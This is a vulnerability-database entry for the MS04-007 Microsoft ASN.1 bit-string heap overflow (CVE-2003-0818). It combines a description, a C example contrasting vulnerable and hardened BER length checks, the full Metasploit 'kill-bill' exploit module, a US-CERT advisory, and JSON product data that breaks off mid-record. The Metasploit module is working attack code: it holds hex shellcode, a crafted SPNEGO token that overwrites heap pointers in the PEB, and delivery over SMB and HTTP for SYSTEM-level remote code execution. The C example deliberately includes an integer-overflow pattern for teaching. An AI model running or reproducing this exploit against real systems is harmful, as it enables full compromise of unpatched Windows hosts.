var-200403-0051
Vulnerability from variot

Multiple integer overflows in the Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. The Microsoft Windows ASN.1 library (msasn1.dll) therefore has an integer overflow vulnerability through which a remote attacker may execute arbitrary code with SYSTEM privileges, and so gain administrative control of a vulnerable system. The issue lies in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function, and manifests when that function processes a constructed bit string that contains another nested constructed bit string. The vulnerable code is reachable through a number of security-related operating system components, including Kerberos (UDP port 88), Microsoft IIS with SSL support enabled, and NTLMv2 authentication (TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Applications that use the library are affected as well, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL); the library is used widely in components that handle certificates, such as Internet Explorer and Outlook, and handling of signed ActiveX components could also present an exposure. Note that because the ASN.1 data will typically arrive wrapped in another encoding (Kerberos, SSL, IPSec or Base64), the malicious length values are obfuscated on the wire and as a result are not easily detectable.
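The description above names the bug class (attacker-controlled BER length fields feeding the arithmetic that sizes a heap buffer, with constructed bit strings nested inside constructed bit strings) but not the arithmetic itself. What follows is an added example written for this page, not code from Microsoft, eEye or the Metasploit module: a toy two-pass BER bit-string decoder in C whose first pass computes the allocation size from the length fields. bitstring_alloc_unchecked() shows the vulnerable pattern, where a length of 0xFFFFFFFC plus a few bookkeeping bytes wraps to a tiny allocation that the copy pass would then overflow; bitstring_size_checked() shows the validation a decoder needs (every length must fit inside its parent, nesting depth is bounded, and the running total is accumulated with an overflow check). The "+4 bookkeeping bytes", the function names and the two byte strings are assumptions constructed for illustration, not msasn1's real allocation formula or real traffic.

```c
/* Added example (not Microsoft's, eEye's or Metasploit's code): a toy two-pass
 * BER bit-string size pass, in a vulnerable and a hardened form. The "+4"
 * bookkeeping overhead is an assumption for illustration only. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define TAG_BITSTRING      0x03   /* primitive bit string   */
#define TAG_BITSTRING_CONS 0x23   /* constructed bit string */

/* Parse a tag and a definite-form length at p. Returns the header size (tag +
 * length bytes) or 0 if the header itself is malformed. Deliberately does NOT
 * check that `len` content bytes exist: that is the caller's job, and the bug. */
static size_t ber_tl(const uint8_t *p, size_t avail, uint8_t *tag, size_t *len)
{
    if (avail < 2) return 0;
    *tag = p[0];
    if (p[1] < 0x80) { *len = p[1]; return 2; }             /* short form */
    unsigned n = p[1] & 0x7f;                               /* long form  */
    if (n == 0 || n > 4 || avail < 2 + (size_t)n) return 0; /* indefinite or > 32-bit */
    size_t l = 0;
    for (unsigned i = 0; i < n; i++) l = (l << 8) | p[2 + i];
    *len = l;
    return 2 + n;
}

/* VULNERABLE pattern: the allocation size is accumulated from attacker-supplied
 * lengths in 32-bit arithmetic with no check against the bytes actually present.
 * A segment claiming 0xFFFFFFFC bytes plus 4 wraps to 0; the buffer handed to the
 * copy pass is far too small, and the copy corrupts the heap. */
uint32_t bitstring_alloc_unchecked(const uint8_t *p, size_t avail)
{
    uint32_t total = 0;
    size_t off = 0;
    while (off < avail) {
        uint8_t tag; size_t len;
        size_t hdr = ber_tl(p + off, avail - off, &tag, &len);
        if (hdr == 0) break;
        if (tag == TAG_BITSTRING_CONS) { off += hdr; continue; } /* descend into segments */
        if (tag != TAG_BITSTRING) break;
        total += (uint32_t)len;           /* unchecked add: wraps */
        off += hdr + len;                 /* overshoots for a huge len; loop ends */
    }
    return (uint32_t)(total + 4);         /* unchecked add: wraps to a tiny size */
}

/* Hardened size pass: each length is checked against the bytes remaining in its
 * parent, recursion depth is bounded, and the total uses overflow-checked adds. */
static bool size_checked(const uint8_t *p, size_t avail, size_t *total, int depth)
{
    if (depth > 8) return false;                          /* bound nesting */
    size_t off = 0;
    while (off < avail) {
        uint8_t tag; size_t len;
        size_t hdr = ber_tl(p + off, avail - off, &tag, &len);
        if (hdr == 0) return false;
        if (len > avail - off - hdr) return false;        /* length exceeds parent */
        if (tag == TAG_BITSTRING_CONS) {
            if (!size_checked(p + off + hdr, len, total, depth + 1)) return false;
        } else if (tag == TAG_BITSTRING) {
            if (len == 0) return false;                    /* needs the unused-bits byte */
            if (len - 1 > SIZE_MAX - *total) return false; /* overflow-checked add */
            *total += len - 1;
        } else {
            return false;
        }
        off += hdr + len;
    }
    return true;
}

/* Payload bytes in a (possibly nested) constructed bit string, or SIZE_MAX if
 * the encoding is rejected. */
size_t bitstring_size_checked(const uint8_t *p, size_t avail)
{
    size_t total = 0;
    return size_checked(p, avail, &total, 0) ? total : SIZE_MAX;
}

/* Constructed sample: three nesting levels, two primitive segments carrying one
 * payload byte each after the unused-bits byte. */
const uint8_t SAMPLE_BENIGN[] = {
    0x23, 0x0c,                    /* constructed, 12 bytes          */
      0x23, 0x0a,                  /*   constructed, 10 bytes        */
        0x03, 0x02, 0x00, 0xaa,    /*     primitive, payload 0xaa    */
        0x23, 0x04,                /*     constructed, 4 bytes       */
          0x03, 0x02, 0x00, 0xbb,  /*       primitive, payload 0xbb  */
};

/* Constructed sample: one segment claiming 0xFFFFFFFC content bytes that are not
 * there (long-form length 84 ff ff ff fc). */
const uint8_t SAMPLE_EVIL[] = { 0x23, 0x06, 0x03, 0x84, 0xff, 0xff, 0xff, 0xfc };

int main(void)
{
    printf("benign: unchecked alloc=%u checked size=%zu\n",
           (unsigned)bitstring_alloc_unchecked(SAMPLE_BENIGN, sizeof SAMPLE_BENIGN),
           bitstring_size_checked(SAMPLE_BENIGN, sizeof SAMPLE_BENIGN));
    printf("evil:   unchecked alloc=%u checked size=%zu (SIZE_MAX means rejected)\n",
           (unsigned)bitstring_alloc_unchecked(SAMPLE_EVIL, sizeof SAMPLE_EVIL),
           bitstring_size_checked(SAMPLE_EVIL, sizeof SAMPLE_EVIL));
    return 0;
}
```

Build with `cc -std=c99 -Wall ber_bitstring.c`. The unchecked pass returns an allocation size of 8 for the benign input and 0 for the hostile one, while the checked pass returns 2 and a rejection respectively. The key design point is that the checked decoder never trusts a length in isolation: each one is compared with the bytes left in the enclosing element, so an oversized inner segment is refused before any arithmetic on it is done, and the nesting bound stops a chain of constructed bit strings from recursing without limit.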
Issues related to this vulnerability were originally covered in BID 9626 and BID 9743; further information has since identified this as a distinct vulnerability in the library, so it has been assigned its own BID. June 5, 2005 update: an IRC bot style tool may be exploiting this vulnerability; this alert will be updated as further information becomes available. The root cause is insufficient checking of an externally supplied length field in ASN.1 BER encoded data. An excessive length value can reach a heap allocation routine, allowing large amounts of heap memory to be corrupted. This can be leveraged to corrupt sensitive values in memory, including heap management structures, and ultimately to execute arbitrary code in the context of the affected process.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::SMB

def initialize(info = {})
    super(update_info(info, 
        'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
        'Description'    => %q{
            This is an exploit for a previously undisclosed
            vulnerability in the bit string decoding code in the
            Microsoft ASN.1 library. Both vulnerabilities were fixed in the
            MS04-007 patch.

            You are only allowed one attempt with this vulnerability. If
            the payload fails to execute, the LSASS system service will
            crash and the target system will automatically reboot itself
            in 60 seconds. If the payload succeeds, the system will no
            longer be able to process authentication requests, denying
            all attempts to login through SMB or at the console. A
            reboot is required to restore proper functioning of an
            exploited system.

            This exploit has been successfully tested with the win32/*/reverse_tcp
            payloads, however a few problems were encountered when using the
            equivalent bind payloads. Your mileage may vary.

        },
        'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
        'License'        => GPL_LICENSE,
        'Version'        => '$Revision$',
        'References'     =>
            [
                [ 'CVE', '2003-0818'],
                [ 'OSVDB', '3902' ],
                [ 'BID', '9633'],
                [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
                [ 'MSB', 'MS04-007'],

            ],
        'DefaultOptions' =>
            {
                'EXITFUNC' => 'thread'
            },              
        'Privileged'     => true,
        'Payload'        =>
            {
                'Space'    => 1024,
                'StackAdjustment' => -3500,
            },
        'Platform'       => 'win',
        'Targets'        => 
            [
                [ 
                    'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
                    {
                        'Platform' => 'win',
                    },
                ],
            ],
        'DisclosureDate' => 'Feb 10 2004',
        'DefaultTarget' => 0))

    register_options(
        [
            OptString.new('PROTO', [ true,  "Which protocol to use: http or smb", 'smb']),
        ], self.class)          
end

# This exploit is too destructive to use during automated exploitation. 
# Better Windows-based exploits exist at this time (Sep 2006)
def autofilter
    false
end

# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
# as a Metasploit Framework module with his permission. This module is only
# licensed under GPLv2, keep this in mind if you embed the Framework into
# a non-GPL application. -hdm[at]metasploit.com

def exploit

    # The first stage shellcode fixes the PEB pointer and cleans the heap
    stage0 = 
        "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
        "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
        "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
        "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
        "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
        "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
        "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
        "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
        "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
        "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
        "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
        "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
        "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
        "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
        "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
        "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
        "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
        "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
        "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
        "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
        "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
        "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
        "\x08\x00\xeb\xfe"

    token = spnego_token(stage0, payload.encoded)

    case datastore['PROTO']
        when 'smb'
            exploit_smb(token)
        when 'http'
            exploit_http(token)
        else
            print_status("Invalid application protocol specified, use smb or http")
    end
end


def exploit_smb(token)
    connect

    client = Rex::Proto::SMB::Client.new(sock)

    begin
        client.session_request(smb_hostname()) if not datastore['SMBDirect']
        client.negotiate
        client.session_setup_ntlmv2_blob(token)
    rescue => e
        if (e.to_s =~ /error code 0x00050001/)
            print_status("The target system has already been exploited")
        else
            print_status("Error: #{e}")
        end
    end

    handler
    disconnect
end

def exploit_http(token)
    connect

    req = "GET / HTTP/1.0\r\n"
    req << "Host: #{ datastore['RHOST']}\r\n"
    req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

    sock.put(req)
    res = sock.get_once

    if (res and res =~ /0x80090301/)
        print_status("This server does not support the Negotiate protocol or has already been exploited")
    end

    if (res and res =~ /0x80090304/)
        print_status("This server responded with error code 0x80090304 (wth?)")
    end

    handler
    disconnect
end


# Returns an ASN.1 encoded string
def enc_asn1(str)
    Rex::Proto::SMB::Utils::asn1encode(str)
end

# Returns an ASN.1 encoded bit string with 0 unused bits
def enc_bits(str)
    "\x03" + enc_asn1("\x00" + str)
end

# Returns a BER encoded constructed bit string
def enc_constr(*str_arr)
    "\x23" + enc_asn1(str_arr.join(''))
end

# Returns a BER encoded SPNEGO token
def spnego_token(stage0, stage1)

    if !(stage0 and stage1)
        print_status("Invalid parameters passed to spnego_token")
        return
    end

    if (stage0.length > 1032)
        print_status("The stage 0 shellcode is longer than 1032 bytes")
        return
    end

    tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

    if ((tag.length + stage1.length) > 1033)
        print_status("The stage 1 shellcode is too long")
        return
    end


    # The first two overwrites must succeed, so we write to an unused location
    # in the PEB block. We don't care about the values, because after this the
    # doubly linked list of free blocks is corrupted and we get to the second
    # overwrite which is more useful.

    fw = "\xf8\x0f\x01\x00"     # 0x00010ff8
    bk = "\xf8\x0f\x01"

    # The second overwrite writes the address of our shellcode into the
    # FastPebLockRoutine pointer in the PEB

    peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

    bitstring = enc_constr( 
        enc_bits("A" * 1024),
        "\x03\x00",
        enc_constr(
            enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
            enc_constr( enc_bits(fw + bk) ),
            enc_constr(
                enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
                enc_constr(
                    enc_bits("\xeb\x06" + make_nops(6)),
                    enc_bits("D" * 1040)
                )
            )
        )
    )

    token = "\x60" + enc_asn1(                 # Application Constructed Object
        "\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID
        "\xa0" + enc_asn1(                     # NegTokenInit (0xa0)
            "\x30" + enc_asn1(
                "\xa1" + enc_asn1(
                    bitstring
                )
            )
        )
    )

    return token    
end

end

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multiple Vulnerabilities in Microsoft ASN.1 Library

Original issue date: February 10, 2004
Last revised: --
Source: US-CERT

A complete revision history is at the end of this document.

According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic.

Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (X.509), Kerberos, NTLMv2, SSL, and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Solution

Apply a patch

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007.

Vendor Information

This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments.

Microsoft

 Please see Microsoft Security Bulletin MS04-007.

References

 * Vulnerability Note VU#216324 -
   <http://www.kb.cert.org/vuls/id/216324>
 * Vulnerability Note VU#583108 -
   <http://www.kb.cert.org/vuls/id/583108>
 * eEye Digital Security Advisory AD20040210 -
   <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
 * eEye Digital Security Advisory AD20040210-2 -
   <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html>
 * Microsoft Security Bulletin MS04-007 -
   <http://microsoft.com/technet/security/bulletin/MS04-007.asp>
 * Microsoft Knowledge Base Article 252648 -
   <http://support.microsoft.com/default.aspx?scid=252648>
 _________________________________________________________________

These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document.

Feedback can be directed to the author, Art Manion.

Copyright 2004 Carnegie Mellon University.

Revision History

February 10, 2004: Initial release

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW
5hU8LQ/oOC4sI8PpnkppCyg=
=Oe/N
-----END PGP SIGNATURE-----



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200403-0051",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 1.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "r2"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "standard"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "web"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "enterprise"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows 2003 server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "enterprise_64-bit"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1358"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1356"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1355"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1351"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6.0.1347"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "yahoo",
        "version": "5.6"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.5"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.4"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.3"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.2"
      },
      {
        "model": "securecrt",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "vandyke",
        "version": "4.0.1"
      },
      {
        "model": "windows xp professional sp1",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp professional",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home sp1",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp 64-bit edition version sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows xp 64-bit edition version",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows xp 64-bit edition sp1",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp 64-bit edition",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt workstation sp6a",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp6",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp5",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp6",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp5",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6a",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp6",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp5",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows 98se",
        "scope": null,
        "trust": 0.9,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "98"
      },
      {
        "model": "windows server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp4",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp3",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp2",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "quicken",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "intuit",
        "version": "2003"
      },
      {
        "model": "instant messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "aol",
        "version": "5.2.3292"
      },
      {
        "model": "instant messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "aol",
        "version": "5.1.3036"
      },
      {
        "model": "instant messenger",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "aol",
        "version": "5.0.2938"
      },
      {
        "model": "windows 2000",
        "scope": null,
        "trust": 0.8,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "4.0 (server)"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "4.0 (terminal_srv)"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "4.0 (workstation)"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "yahoo",
        "version": "5.5.1249"
      },
      {
        "model": "messenger",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "yahoo",
        "version": "5.5"
      },
      {
        "model": "jukebox",
        "scope": "eq",
